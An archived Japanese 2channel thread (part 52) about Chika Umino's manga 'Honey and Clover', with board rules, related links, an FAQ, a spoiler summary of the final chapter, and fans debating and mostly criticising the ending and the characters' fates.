5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その52

1 :花と名無しさん:2006/07/28(金) 02:14:05 ID:???0
◆ コミックス第9巻…発売中 ◆
◆ アニメ第2部…放送中 ◆
◆ 映画…上映中 ◆

※アニメ、映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※


★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※

★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※

★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※


≪前スレ≫
羽海野チカ「ハチミツとクローバー」その51
http://comic6.2ch.net/test/read.cgi/gcomic/1153927530/


関連スレ,頻出質問事項等は>>2-20あたりに

2 :花と名無しさん:2006/07/28(金) 02:14:53 ID:???0
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on

≪関連スレ≫
≪過去ログ≫
http://makimo.to:8000/cgi-bin/search/search.cgi?q=%89H%8AC%96%EC%83%60%83J&sf=2&andor=AND&H=&view=table&all=on

≪関連スレ≫
ハチミツとクローバー II chapter.2 【ハチクロ】
http://anime.2ch.net/test/read.cgi/anime/1152568435/ (アニメ板)
【櫻井翔】ハチミツとクローバー3冊目【蒼井優】
http://tv8.2ch.net/test/read.cgi/cinema/1153675073/(映画作品・映画人板)
ヤフー掲示板 ハチミツとクローバー
http://messages.yahoo.co.jp/bbs?action=m&board=552018449&tid=a1ya5oa5aa5dfa5da4ha5afa5ma1bca5pa1bca1y&sid=552018449&mid=1

3 :花と名無しさん:2006/07/28(金) 02:15:38 ID:???0
≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]

4 :花と名無しさん:2006/07/28(金) 02:16:11 ID:???0
羽海野チカインタビュー
ttp://books.yahoo.co.jp/interview/detail/07145617/01.html
・キューコミで初めはカットを描いてほしいって頼まれたのが
作者のアピールでマンガ連載って事になる。
・初めは竹本・真山・森田の三人の学生生活とか青春物を描く予定だった
・彼らの恋愛も描きたくなったので女子キャラ投入
・掲載誌を移ることになってクリスマスやら何やらのイベントをもう一回
やりたいからその為に一年分の時間を稼ぐ為に竹本を留年させた。
●真山のモデルはスガシカオの歌詞の主人公
ttp://www.s-woman.net/umino/1.shtml
「スガさんのつくった歌の中に、真山君みたいな子が出てくるときがときどきあるんです。多分、ご本人が自分のことを歌っているんだと
思うんですけども。ちょっと自分をどう扱っていいかわかんないみたいな
男の子が出てきて、マンガにしたら、今まで見たことない男の子に
なるんじゃないかなと」

5 :花と名無しさん:2006/07/28(金) 02:16:51 ID:???0
●修とはぐの恋愛は羽海野の芸能人萌えのせい。
 竹本の糞男化は羽海野の芸能人萎えのせい。
・映画の修役の堺雅人が、最近の修の描写に影響
・映画のはぐ役の、最近のはぐの描写に影響
・アニメの竹本役と、映画の竹本役(ジャニーズ嵐の櫻井)が
 最近の竹本の描写に影響 …なことを羽海野が映画版ハチクロ本にて暴露。

6 :花と名無しさん:2006/07/28(金) 02:17:36 ID:???0
●● 竹本の不幸  ●●
・小学生の頃父が他界。高校で母が再婚するが、自分の進む道がわからなくなる。
 この頃からすでに彼の自分探しは始まっていた。探さない方がいいのに。
・浜美入学早々森田に中学生みたいな髪型にされ一年間振り回される。
・天才はぐに一目惚れし、己の平凡さを嘆き将来に不安を覚える。ここから真の不幸が始まる。
・今日なんで集まったんだっけ?「ぼくの誕生日ですよ」しかもツイスターゲーム。
・はぐの部屋に泊まる事になるが、夜中にベルサイユのキッチンセットを作ってと言い残しはぐ就寝。
 ただの奴隷扱いだがこれはまだ幸せだったかもしれない。むしろ絶頂期。
・森田がはぐを好きだと気付き、勝ち目が無いと悟りぼんやりする。
・夜、電話一本でクリスマスなのにバルーンアートを徹夜で作る手伝いにかりだされる。不眠でバイトへ。
・「はぐは森田となかよしだったりするのかい?」「先生…ぼくに聞かないでください」
・就職に失敗し続け学園祭用の謎の塔を一心不乱に作り続ける。この頃から鬱病気味に。
・錯乱した山田のかかと落としが直撃。
・「いるべき人が いなくって いなくても どってことない人間が ここでケーキを口に運んでいる」
 クリスマスケーキを食べながら超ネガティブ思考。そしてまたツイスターゲーム。
・卒業制作の作業中に吐血>入院>浪人。
・内定が決まった日に、就職先がどうやら倒産しそうだという報せが就職祝い中に届く。
・幻聴が聴こえてくる。気付いたら自転車で海へ。ここは精神崩壊の瀬戸際だったがなんとか持ちこたえた。
・ママチャリであてもなく日本列島を北上。痔になる。
・旅先で住み込みバイト中に、年下の元ヤンから「おまえ」「ばかじゃねーの」等の罵声を浴びる。
・一皮むけて旅から帰ってきてフラれる。

●● 竹本の人格崩壊後 ●●●●●●●●

・花も買えない情けない男
・森田をねたんで、森田にはぐみを取られるくらいなら修に取られる
 ほうがマシだと、修にはぐみに愛の告白をするようたきつける
・兄貴と関係で不幸のズンドコの森田に対して、人間として
 言ってはいけないことを言う

7 :花と名無しさん:2006/07/28(金) 02:18:08 ID:???0
●●コミックスになっていない分のあらすじ●●

治さなくていい、いてくれるだけでいいと精一杯告白する森田に
描けなくなったら私は死んじゃうと、病院に戻るはぐ。
病院から外へ連れ出した森田を殴る修。

はぐ、修の手を握りながら
「あのねお願いがあるの 修ちゃんの人生を私に下さい 
ごめんね 返せるかもわかんないのに こんな事言って でも
でも・・・私描きたいのずっと だから 一緒にいて 最後の最後まで」
「いいよ・・・返さなくていいよ 全部やるよ」と返事する修。ラブラブムード。
はぐのモノローグ
『修ちゃんは私の雨だ。一緒にいると深く息ができて草や木みたいに
 ぐんぐん伸びてゆけそうな気がする。 私のだいじな だいじな ひと』

別の場面で、森田と竹本は殴りあい。人格崩壊後の竹本は、森田をねたんで
金と才能だけの人間でしかない森田にはぐを取られるくらいなら
修に取られたほうがマシだったと言う。森田の頭の中に「才能才能才能」の言葉が響く。

森田は修に現金が大量に入った段ボールを
「これでアイツ(はぐみ)を治してやってくれ」と修に贈りつけるが
修はそのうち札束3つ(約300万)をゲットして、それ以外は森田に投げつけて返し
「金は返すがはぐは返さん! ハハハハ (はぐのことは)好きさ!大好きさ!」
と真っ赤になりながら叫ぶ。 そして森田は去ってゆく。

そんな修にキャーキャーいいながら驚く山田。
野宮は、リーダー(犬)を比喩に出して、山田に臭とはぐと森田の関係を納得させる。
リカと修は抱擁の末、別れた。
真山は、修がはぐみを好きなことを大歓迎の様子で、大喜びする。

8 :花と名無しさん:2006/07/28(金) 02:18:58 ID:???0
 918  822 [sage] 2006/07/27(木) 00:08:41 ID:???0
ではもう少し詳細なバレ投下します。ネタバレ嫌な人は避けてね。


○表紙ハチクロ。巻頭ではないが見開きカラー扉あり。
〈内容〉
引越しの準備でボロアパート部屋を片付ける竹本。
その後、送別会を開く。(森田はいない)
真山が「最後だから竹本はウチに泊まらせますよ」の言葉に反応して
みんな泣きそうになる。
思わず修がはぐにおつかいを頼み、付き添いで竹本も外出。
竹本のチャリの後ろにはぐが座る。怪我はかなり回復している様子。
はぐが竹本の卒制作品について語る。
「竹本君はどこにも手を抜かない人だから、竹本君に作ってもらったお寺は幸せだね」等。
「今まで修ちゃんに沢山のものを貰ったから、返さないといけない」とも言う。
それに対して竹本「はぐちゃんはそんなこと考えなくていいよ。先生は自分で見つけられる人だから」
はぐ「…ありがとう。」

美和子さん山崎が仲直りをセッティングしてくれる。(前回野宮が山田をいじめた件で)
野宮と山田が落ち合う。前回のことで気まずい2人。
山田が「もう会わない方がいいのかもしれない」と言うと、野宮は納得して去ろうとするが
泣いてしまう山田に振り返って「真山のことはずっと引きずっているけど、でも一緒にいよう」
というような事を話す。手を繋がれたまま山田号泣。

9 :花と名無しさん:2006/07/28(金) 02:19:40 ID:???0
森田と馨が2人布団を並べて会話をしている。
はぐのことを聞かれ「あいつは強い女だよ」など少し語る。
ピーターの所に行く決心も語る。
「会社が停電したらピーターも他の社員も、みんなビームサーベルもって部屋から出てくるんだぜ!?
こんな大人達、父さん以外見たことない」
会話の最中にぼんやりと光りが出てくる。「父さんが言ってたことが分かったような気がする」

竹本のモノローグに移る。
報われない片思いは意味があるのか云々語り、「はぐちゃん、君を好きになって良かったよ」という結論に達する。
モノローグの間に場面が展開して、駅のホームで竹本がはぐから包みを渡される。
席に着いて開けてみると、パンが何段も重なったサンドイッチが入っていた。
パンをめくって中身を見てみると、ハチミツが縫ってある。真ん中には四葉のクローバーが。
昔みんなでクローバーを探した記憶が蘇る。「あの時全然見つからなかったのに…」
更にめくると、全段にハチミツと四葉のクローバーが入っていた。
電車の中で竹本号泣。
モノローグで少し語って終了。


こんな感じでした。抜けてるエピソードとかあるかもしれません。
台詞やモノローグもあやふやですみません。

最終回だったのに、次号予告で何故かハチクロの付録がありました。

10 :花と名無しさん:2006/07/28(金) 02:24:03 ID:Bm3Lpw0W0
もうこの作者の次の作品に期待しない

11 :花と名無しさん:2006/07/28(金) 02:24:18 ID:???0
ウミノさんボロボロなんじゃない?
だから無理矢理終わらせちゃった・・・
絵を見たらなんだかそんな気が。絵が、力なく荒れてる。

12 :花と名無しさん:2006/07/28(金) 02:26:17 ID:???0
純粋 クローバーのハチミツ
http://www.sakura-shop.co.jp/shop/index.html#clover


クローバーのハチミツ入りサンドイッチならともかく
クローバーの葉っぱ入れたサンドって食って大丈夫なのか?
腹壊さないか?
 

13 :花と名無しさん:2006/07/28(金) 02:27:10 ID:???0
絵も話も適当で無理矢理終了って20世紀少年かよ

14 :花と名無しさん:2006/07/28(金) 02:30:03 ID:???0
集英社は作家潰し&人気連載のストーリークラッシャーとして悪名高い出版社だからな
人気投票の結果で結末や展開が変わるなんてザラだから

でも、本当にドル箱として作品を続けさせたかったら全力で引き伸ばしに掛かるだろうから
実際のところはどうなんだろうね

15 :花と名無しさん:2006/07/28(金) 02:31:49 ID:???O
>>13
20せいき少年おわったの!?

16 :花と名無しさん:2006/07/28(金) 02:32:53 ID:???0
みんなでクローバー探して終わったのが
最終回だったら良かったんじゃ…

17 :花と名無しさん:2006/07/28(金) 02:35:06 ID:???0
>>15
何の謎も解決せず突然終了
新春に新章が始まると予告されているが本当にあるのかも謎

18 :花と名無しさん:2006/07/28(金) 02:35:54 ID:???0
もうスピンオフも描かなくていいよウミノさん

19 :花と名無しさん:2006/07/28(金) 02:37:02 ID:???O
>>17
そんな………ハチクロ最終回よりショックだよ。

20 :花と名無しさん:2006/07/28(金) 02:38:21 ID:???0
チャミーン

21 ::2006/07/28(金) 02:39:00 ID:???0
はわわ〜はわわ〜

22 :花と名無しさん:2006/07/28(金) 02:39:07 ID:???0
スピンオフがホントの意味でのスピンオフなら
ローマイヤ先輩以外要らない
後日談の意訳なら少し欲しい

23 :花と名無しさん:2006/07/28(金) 02:39:21 ID:???O
なんで最終回って書いてないの…

24 :花と名無しさん:2006/07/28(金) 02:39:22 ID:???0
そういえば「みんなで集まる事はもうないだろう」とか
主要キャラの死亡フラグ的なものがたまに出てきたけど
あれは結局なんだったんだろう

25 :花と名無しさん:2006/07/28(金) 02:40:29 ID:???0
>>24
森田さんとの喧嘩別れだろ

26 :花と名無しさん:2006/07/28(金) 02:41:28 ID:???0
>>24
森田ハブ

27 :花と名無しさん:2006/07/28(金) 02:42:48 ID:???0
友達同士が恋のさや当てしてるときは、
どっちとも友達なら、手を出さないのが常識じゃないか?
全員が相手の味方して、自分だけもう加われない雰囲気作られたら、絶望するだろうな

28 :花と名無しさん:2006/07/28(金) 02:44:07 ID:???O
なんだ、別に言うほど森田排除してないじゃん。いないけど、一応ライブカメラでつながってるじゃん

つか、あなたはだぁれ?の回想のはぐ、デケー
昔は竹本の胸のあたりだったじゃないか

29 :花と名無しさん:2006/07/28(金) 02:44:21 ID:???0
だから真山は臭はぐを喜んでたんだろ
筍暴走が森田ハブの原因

30 :花と名無しさん:2006/07/28(金) 02:45:24 ID:???0
>>28
あいつらは、カメラ通して森田冷やかしてるのかもしれんが、
森田からすりゃ、絶対にあいつら、とくに竹本と一緒に酒のむなんて無理

31 :花と名無しさん:2006/07/28(金) 02:46:01 ID:???0
せめてスピンオフで仲直りして欲しいぜ

32 :花と名無しさん:2006/07/28(金) 02:47:15 ID:???0
>>28
映画の葵の影響?
もしくは作中で背が伸びたw

33 :花と名無しさん:2006/07/28(金) 02:47:23 ID:???0
この最終回のオチはもしかして>>5の映画化の影響なのか?

34 :花と名無しさん:2006/07/28(金) 02:49:25 ID:???0
>>29
真山が喜んでいたのは修&理花の不成立が確定したからだろう
原田を除けば一番の脅威かつライバルだった人が脱落したんだから当然なんだが

たけのことの喧嘩も原因のひとつではあるんだろうが
森田の場合、一番の原因は自分の境遇に対する理解者を自分から得ようとしなかったことだろうね
せめてたけのこか山田かはぐに話していれば少しは違っていたと思う

35 :花と名無しさん:2006/07/28(金) 02:50:17 ID:???O
なにもかも偽善的で表面的だね
それを詩的なモノローグと絵でごまかしてる

36 :花と名無しさん:2006/07/28(金) 02:50:23 ID:???0
面倒になったのか、ゴーストがやめて作者自身が
シナリオ考えたらこういう展開になったのかは知らないけど
確かに後半は読み物としてつまらなくなった。
巧くて綺麗なんだけど、反比例するように画の力強さもなくなったし。

森田が結構いい味だしてたのに書く側がその存在を抑えてしまったのは
見てて違和感がありすぎて最後のほうは読むの苦痛でした。

まあそれでも当初のプロットの通りぽく終わったのでいいのではと
思うが。ただ二度と見ようとは思わないですけど。




 

37 :花と名無しさん:2006/07/28(金) 02:54:29 ID:???0
少女漫画って少年漫画と違って作者のモチベーションがモロに最終話に影響する感があるな
少年漫画は様式美(打ち切り)みたいなのがあるから諦観できるけど
少女漫画のこういう最後はなんかすっきりしない

38 :花と名無しさん:2006/07/28(金) 02:57:03 ID:???O
>>32
ぜったい影響でしょう。
女の子は生理来ると背がのびなくなるものだけど

39 :花と名無しさん:2006/07/28(金) 02:59:18 ID:???0
ふと思ったんだけど、スピンオフバージョンって番外編が1〜2回
載るんじゃなくて、続編として新連載ってことはないよね?

40 :花と名無しさん:2006/07/28(金) 03:03:19 ID:???0
臭先生が王子様みたいになってるwwww
なんだこりゃww

41 :花と名無しさん:2006/07/28(金) 03:05:31 ID:???O
>>34
森田家の復讐劇を知ってる人は4人の中にいないんだっけ?
はぐがちょっと感じ取っている程度かな?
森田は真山と山田やはぐの心の変化にはよく気づいたけれど
(竹本はどうかな…一度頬をつまんだり、意味深に見つめる場面はあったけど)
森田に悩みがあった場合、誰に相談するのが適任なのか…

42 :花と名無しさん:2006/07/28(金) 03:07:51 ID:???O
>>39
私もそんな気がしてきた…だって最終回って書いてないのがおかしいよ。普通、映画化してアニメ化して人気沸騰中ならデカデカといれるはず。

今までは竹本のモノログで竹本編みたいなトコあったから、竹本排除後、衆とはぐの萌え萌え編がはじまったりして

43 :花と名無しさん:2006/07/28(金) 03:09:03 ID:???O
>>41
位置でいえば山田かな。

44 :花と名無しさん:2006/07/28(金) 03:12:37 ID:???0
>>42
色んなメディア化した作品は
そのメディアのブームが終わると売り上げが低下する傾向がある
あたりまえだが

だから最近はメディアで高騰中のうちに「完結作品」として売りつくしてしまう風潮
完結作品の映画化、ドラマ化多いしね
集英社は特にデスノート(映画化と同時に最終話→10月からアニメ)とか、
ブラックキャットとか、武装錬金とか、完結作品を無理矢理高騰させてるっしょ?

45 :花と名無しさん:2006/07/28(金) 03:16:17 ID:???O
>>44
なら尚更、話題のハチクロ満を持して最終回!!と銘打ってコーラスのうりあげを伸ばそうとした方がいいんじゃないかなあ。。

46 :花と名無しさん:2006/07/28(金) 03:18:14 ID:???0
しかし本当にくだらない作品に成り下がったよな。
こんな投げやりな作者のコミックは2度と買わないだろう。


47 :花と名無しさん:2006/07/28(金) 03:19:36 ID:???0
とりあえず将棋漫画は絶対読みたくないな

48 :花と名無しさん:2006/07/28(金) 03:20:31 ID:???0
多分コミックスでまとめて読めば、まだましに感じるとは思う。
だけどこのところの強引な展開・無意味な展開には
疑問を隠せないのは確かだな。

49 :花と名無しさん:2006/07/28(金) 03:20:32 ID:???0
>>45
それとは悟らせないようにしとかないと次号以降が続かないだろ

50 :花と名無しさん:2006/07/28(金) 03:23:42 ID:???O
>>49
デスノとかもさりげなくおわたの?

51 :花と名無しさん:2006/07/28(金) 03:23:55 ID:???0
多分に説明不足だし展開も独りよがりだから
読者置いてきぼりで総スカン状態のままフィナーレ。
説得力の欠片もない。


52 :花と名無しさん:2006/07/28(金) 03:27:06 ID:???0
デスノの最終話は糞だったな
でも最終の1話前はよかった

53 :花と名無しさん:2006/07/28(金) 03:29:37 ID:???O
人気絶頂で美しく終わった漫画ってないの…?

54 :花と名無しさん:2006/07/28(金) 03:30:44 ID:???0
>>53
デビルマン

55 :花と名無しさん:2006/07/28(金) 03:33:28 ID:21xl5CnfO
>>53
スラムダンク
うみのさんも見習え

56 :花と名無しさん:2006/07/28(金) 03:34:36 ID:???0
「8巻〜は別作品」と思って読めば
今回の最後の締め、自分的にはなかなか良かった。
(ポエム乱発は少々気になったが)

スピンオフバージョンは、どこに照準当てて展開するつもりなんだろう。
普通に考えて恋愛方面だとは思うが
・・・森田がはぐに恋の再アタック?
修→はぐ、禁断の愛(っぽい)コメディ?
野宮・山田組にナニか進展が?

期待しないで待っていようっと。

57 :花と名無しさん:2006/07/28(金) 03:35:01 ID:w9MLUpYBO
アニメスレでネタバレするのとか糞とかいいにくるのやめれ

58 :花と名無しさん:2006/07/28(金) 03:37:31 ID:???O
>>うしおととら

59 :花と名無しさん:2006/07/28(金) 03:37:53 ID:???0
>>55
それはどうよ?
これと同じくらいヒドいもんじゃないか?

60 :花と名無しさん:2006/07/28(金) 03:39:36 ID:???O
>>53
マサルさん

61 :花と名無しさん:2006/07/28(金) 03:40:15 ID:???O
少女漫画でお願いします

62 :花と名無しさん:2006/07/28(金) 03:40:47 ID:???0
スラムダンクは確かに違うw
美しきエンドではない。

63 :花と名無しさん:2006/07/28(金) 03:40:49 ID:???0
ガラスの仮面

64 :花と名無しさん:2006/07/28(金) 03:41:36 ID:???0
終わってねーよw

65 :花と名無しさん:2006/07/28(金) 03:42:47 ID:???0
O家の紋章

66 :花と名無しさん:2006/07/28(金) 03:43:07 ID:???0
少女漫画は作者が投げ出してうやむやなうちに終了

ってイメージしかない

67 :花と名無しさん:2006/07/28(金) 03:43:16 ID:???O
>>58
>>53うしおととら ね

68 :花と名無しさん:2006/07/28(金) 03:43:57 ID:???0
パタリロ

69 :花と名無しさん:2006/07/28(金) 03:44:09 ID:???0
少しマイナーだけどカードキャプターさくらとか
あとは花より男子とかBASARAとか

でも、ガラスの仮面はともかくイタズラなKissはまさかああいう形で未完になるとは思わなかった(´・ω・`)

70 :花と名無しさん:2006/07/28(金) 03:44:36 ID:???0
山崎の恋愛の行方とか、飲み屋の過去の恋話とからしいよ

71 :花と名無しさん:2006/07/28(金) 03:45:14 ID:???0
コーラススレでコーラス読者が
はぐが小さいなんて設定シランカッタ
そんな説明なかった
と書いていた気がする。
確かに寝ているか座っているかばかりかも。
コーラスに行ってから背が伸びたのか?


72 :花と名無しさん:2006/07/28(金) 03:45:28 ID:???0
>>70
マジいらねぇ

73 :花と名無しさん:2006/07/28(金) 03:45:50 ID:???O
読んだけど結構良かった。どうしてこれほど酷評されるのかわからない。

74 :花と名無しさん:2006/07/28(金) 03:46:27 ID:???0
>>73
たけのこと森田の関係が壊れたままフォローなしなところ

75 :花と名無しさん:2006/07/28(金) 03:46:57 ID:???O
>>69
ああ、バサラは綺麗に終わったよね
バナナフィッシュも綺麗に終わった方?


野宮の過去なんかイラネ

76 :花と名無しさん:2006/07/28(金) 03:47:16 ID:???O
スラムダンクの最終回最高だよ
ハチクロと同じレベルに置かないでくれたまへ

77 :花と名無しさん:2006/07/28(金) 03:49:02 ID:0f7S4uq7O
三巻のネズミロールのとこかなり萌える!!四巻までしかねぇから皆さんの話がとても信じられません…

78 :花と名無しさん:2006/07/28(金) 03:49:05 ID:???0
>>53
スラムダンクの終わりもどうなんだ?「第一部 完」だし

79 :花と名無しさん:2006/07/28(金) 03:49:28 ID:???0
バスケットマンですから!

80 :花と名無しさん:2006/07/28(金) 03:50:50 ID:???0
>>73
雰囲気だけはいいからね。
しかし修はぐがどうしても許せなかったから、話が収束していくにつれて「マジでこのまま終わんの!?」の部分に気を取られて感動も何もなかった。

81 :花と名無しさん:2006/07/28(金) 03:50:52 ID:???0
スラダンのあの終わりは編集と喧嘩別れしたからじゃないの?

82 :花と名無しさん:2006/07/28(金) 03:51:59 ID:???O
月の子…とかは?

しかしたけのこって、
感情移入しやすいし語りべとしての役割があるから
読者にとっては親しみやすいキャラだったかもしれないけど、
作中では周囲に心配かけただけで結局いらない子になってないか?


83 :花と名無しさん:2006/07/28(金) 03:52:31 ID:???O
>>77
私も5巻まで買ってこのスレ来て買う気なくして今日最終回を読みました。
はぐが別人でビビった!背のびてるよ!

84 :花と名無しさん:2006/07/28(金) 03:52:55 ID:???0
ジャンプ系は逆に20話前後で終わるような単発作品の方が面白いような

長期連載の稼ぎ頭になるほど最終回を迎えさせずに引き伸ばす傾向が強いし
余程のベテランでない限り人気投票最下位にならないと終わらせてもらえないから
結局ラストはどうしても打ち切りに近い状態でバタバタと片付けられるんだよね

いやぶっちゃけ打ち切りなんだが

85 :花と名無しさん:2006/07/28(金) 03:53:43 ID:???0
>>82
主要メンツの中で、あらゆる面で格下だったからな
一番の凡人と言うか

身の丈にあった恋愛してろよ童貞
ってメッセージなのかな

86 :花と名無しさん:2006/07/28(金) 03:53:51 ID:???0
度々「最終回って書いてないよ!?本当に終わりですか??」と書いてるやつがいるが
ちゃんと端に「長い間御愛読ありがとうございました」と書いてるぞ。
つづく、じゃなくて、おわり、だし。

87 :花と名無しさん:2006/07/28(金) 03:53:59 ID:???0
>>80
雰囲気で勘違いするのが多そうな気がする
これウミノ絵じゃ無いで他の作家が書いたらまず読めたもんじゃない

88 :花と名無しさん:2006/07/28(金) 03:55:56 ID:???O
>>86
終わってほしくないとかじゃないよ。
普通、雑誌の表紙にも書くものだと思っていたから。

89 :73:2006/07/28(金) 03:56:50 ID:???O
でも修ははぐ→森田を見守ってたし、竹本の言う通り何も欲はないと思う。

90 :花と名無しさん:2006/07/28(金) 03:58:51 ID:???0
主要キャラ同士(森田×たけのこ)がケンカ別れで終わる漫画があったか?

91 :花と名無しさん:2006/07/28(金) 04:00:03 ID:???0
臭はこれからも心秘かにはぐにはあはあしながら生きていくんだね。

92 :73:2006/07/28(金) 04:00:20 ID:???O
竹本森田のは偽悪的というか、敢えて慰め合わず喧嘩したけどわだかまりは残ってないんじゃない?

93 :花と名無しさん:2006/07/28(金) 04:00:22 ID:???0
>>89
修がはぐ→森田を見守っても、結局はぐは都合のいい人間が欲しかっただけになるし
修も完全捨て子間扱いじゃん。
森田の気持ちも報われないし。はぐが我侭なだけ。そして受け入れる修もおかしい。
読者としてはモヤモヤが残るだけだ。

94 :花と名無しさん:2006/07/28(金) 04:02:33 ID:???0
>>92
それを作中で描いてくれてればまだマシなんだけど

喧嘩別れ以外は概ね満足よ?

95 :73:2006/07/28(金) 04:06:29 ID:???O
あそこで森竹和解入れたら却って安っぽくない?二人とも大人だからわかってるかと。

96 :花と名無しさん:2006/07/28(金) 04:06:54 ID:???O
山田って真山の何がそんなに好きなんだろうか?
理由なんかわからない、それが恋と言われたらそれまでだが

97 :花と名無しさん:2006/07/28(金) 04:07:38 ID:???0
読者としては、希望を臭わせた終わり方が好まれる。
たとえ森田はぐが現実的じゃなくても、2人でどこかに旅立ってくれた方が綺麗に終われた。
反面、修はぐは現実的すぎて夢がない。
はぐはずっと保護者が必要で、大人になれなかったことしか伝わらない。

98 :花と名無しさん:2006/07/28(金) 04:07:56 ID:???0
>>95
正面切って和解しなくても
それぞれ蟠りはないよ
って描写が欲しかった

99 :花と名無しさん:2006/07/28(金) 04:08:55 ID:???O
最終回見れば、森田は報われてないことはない(生身で結ばれなくても)

100 :花と名無しさん:2006/07/28(金) 04:10:30 ID:???0
たしかに竹の子よりは僅かに報われている。一ミクロンくらい。
たけのこ・・・・・カワイソス

101 :花と名無しさん:2006/07/28(金) 04:11:29 ID:???O
みんな、覚悟みたいなのが薄いよな・・・

102 :花と名無しさん:2006/07/28(金) 04:13:25 ID:???0
漫画全般にいえるんだけどオレは全員が幸せになるような
オチをいつも期待してるんだがこの考え方は今の漫画じゃ無理なのか…

103 :花と名無しさん:2006/07/28(金) 04:13:37 ID:???0
クローバーサンド貰ったくらいで涙ぐむタケノコカワイソス

104 :73:2006/07/28(金) 04:13:54 ID:???O
はぐだけの利益じゃなく、修も恋愛での見返りはなくてもはぐの芸術世界で生きられることが幸せなんでは?

105 :73:2006/07/28(金) 04:15:55 ID:???O
はぐも自分のエゴを理解し、それでもあらゆる面で理解者の修が必要だと自分で選択したんでは?

106 :花と名無しさん:2006/07/28(金) 04:16:38 ID:???O
>>102
途中に喧嘩やいざこざあって、でもラストはみんな幸せっていいと思う

107 :花と名無しさん:2006/07/28(金) 04:18:32 ID:???0
>>103
クローバーサンド貰ったからじゃなくて
みんなで探して見つけられなかったクローバーを
はぐはタケノコのためにたくさん探し出して、
竹本自身がはぐに言った
「それは先生自身が見つけるものであって、はぐがあげるべきものではない」
「先生はそれをちゃんと見つけられる人」
というセリフに掛かって、結果、
タケノコ自身ははぐに「貰ってしまった」「見つけられない人間」だと気付いてしまったから泣いてしまったのだと

なに言ってんだかワカンネ

108 :99:2006/07/28(金) 04:19:07 ID:???O
竹本は、今回のモノローグで回答が出てたじゃん。竹本があそこで吸収したものが彼にとって大切だったって。

109 :花と名無しさん:2006/07/28(金) 04:22:03 ID:MEuNySjI0
>>108そう思わないとやってられんだろうからな・・・・・・

\(^o^)/ハチクロオワタ\(^o^)/タケノコオワタ

110 :花と名無しさん:2006/07/28(金) 04:22:36 ID:???O
>>107
なんかわかるよ。


111 :73:2006/07/28(金) 04:24:19 ID:???O
ウガったものの見方だ。失恋したり負けたら何も意味がないっていうのも視野が狭い。

112 :花と名無しさん:2006/07/28(金) 04:28:30 ID:???O
恋が実らなくてもそれを糧に成長すれば意味のあるものだと思えるんだろうね。
まあたけのこは若いからさ・・・

113 :花と名無しさん:2006/07/28(金) 04:31:22 ID:???O
単純に成長とかではなくても、経験するだけ人生は豊かになる。

114 :花と名無しさん:2006/07/28(金) 04:31:34 ID:???O
いやぁ 見てきたが 結構満足いく最終回だった
クローバー出てきたのが予想外
個人的に森田天才すぎて嫌いだったから 竹本応援してたが
これはこれでアリかなと
はぐを森田に取られなくてよかった

115 :花と名無しさん:2006/07/28(金) 04:32:41 ID:???0
同じ人・・・・・・だよね・・・・・?

116 :花と名無しさん:2006/07/28(金) 04:33:53 ID:???0
縦読みになったり横読みになったり変な形式のポエムが最後までうざかった

117 :花と名無しさん:2006/07/28(金) 04:34:29 ID:???0
森田に「金と才能『しか』ない」とか言っちゃったたけのこにはなにがあったんだ?

思い出しかないじゃないか
クローバーを見つけることすら出来なかったじゃないか
探せばこんなにたくさんのクローバーがあったのに
それを見つけることすらできなかったじゃないか

ならんで歩くことすらできなかったじゃないか

118 :73:2006/07/28(金) 04:35:13 ID:???O
ごめん名前欄入れるの面倒で

119 :73:2006/07/28(金) 04:36:45 ID:???O
まあ抽象的な描き方だから解釈は別れるかもしれないけどこの曖昧さがハチクロの売りなんでは?

120 :花と名無しさん:2006/07/28(金) 04:38:13 ID:???0
臭はぐさえなければ許容範囲だった。
いや、臭はぐでもいいから「好きさ!大好きさ!」 がなければ…

121 :花と名無しさん:2006/07/28(金) 04:38:40 ID:???0
あの急展開&締め方でそこまで評価できるトチ狂った73の脳内に乾杯w

ま、今日明日でハッキリするでしょ。

122 :花と名無しさん:2006/07/28(金) 04:38:59 ID:???O
描き方だけじゃなくてすべてが曖昧な気がします・・・

123 :花と名無しさん:2006/07/28(金) 04:39:24 ID:???O
やっぱ鍵はクローバーだったか
修がモンゴル行く時の話がとりあえず最終回とか噂だったから
本当に最終回きたら、修はぐEND。こんな感じなんだろうなと思ってたが
切ねえ最終回だな
でも竹本がラストにきたのは意外
やっぱ主役だったのかな・・・

124 :花と名無しさん:2006/07/28(金) 04:40:42 ID:???O
>>121
改行も空気読むこともできない子だから
そっとしておこうよ(ノ∀`)

125 :73:2006/07/28(金) 04:41:29 ID:???O
竹本が失恋しても劣等感の中でも自転車旅でちゃんと自分を肯定出来るようになっただけではダメなのか?

126 :73:2006/07/28(金) 04:43:46 ID:???O
トチ狂ったとか罵倒する前に普通に反論すればいいのに。賛否はあって当然だろ?

127 :花と名無しさん:2006/07/28(金) 04:43:48 ID:???O
すごいな
真山の薄情さについては73はどう感じてるの?
臭はぐになった時、友達の竹本の心配より、恋のライバルが減ったことを喜ぶ真山。

128 :花と名無しさん:2006/07/28(金) 04:46:31 ID:MEuNySjI0
ついでに山田の薄情っぷりも解説(解釈?)たのむ。


129 :73:2006/07/28(金) 04:50:04 ID:???O
真山田については余り興味がないし、全部何が何でも肯定する気もない。自分がいいと思った部分を書いた。

130 :花と名無しさん:2006/07/28(金) 04:51:41 ID:???0
だからそれ以前の段階だからさw
どんな結論になるとしてもその結論までの過程を
丁寧に描いていればある程度は納得できるけどね。
何年間も読ませてこれかよw
で、説明不足だから説得力自体も全然ない。
これで納得しろといわれてもねぇ。
